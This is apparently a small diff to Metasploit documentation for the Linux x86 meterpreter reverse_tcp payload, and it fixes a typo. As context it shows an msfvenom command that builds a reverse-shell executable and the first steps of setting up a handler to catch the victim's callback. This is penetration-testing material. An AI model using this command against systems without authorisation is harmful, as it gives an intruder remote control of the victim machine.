rapid7/metasploit-framework/documentation/modules/payload/linux/x86/meterpreter/reverse_tcp.md

 ./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f elf -o /tmp/payload.bin
 ```

-Before sending the exectauble to the victim machine, you need to set up the handler on your end:
+Before sending the executable to the victim machine, you need to set up the handler on your end:

 1. Start msfconsole
 2. Do: ```use exploit/multi/handler```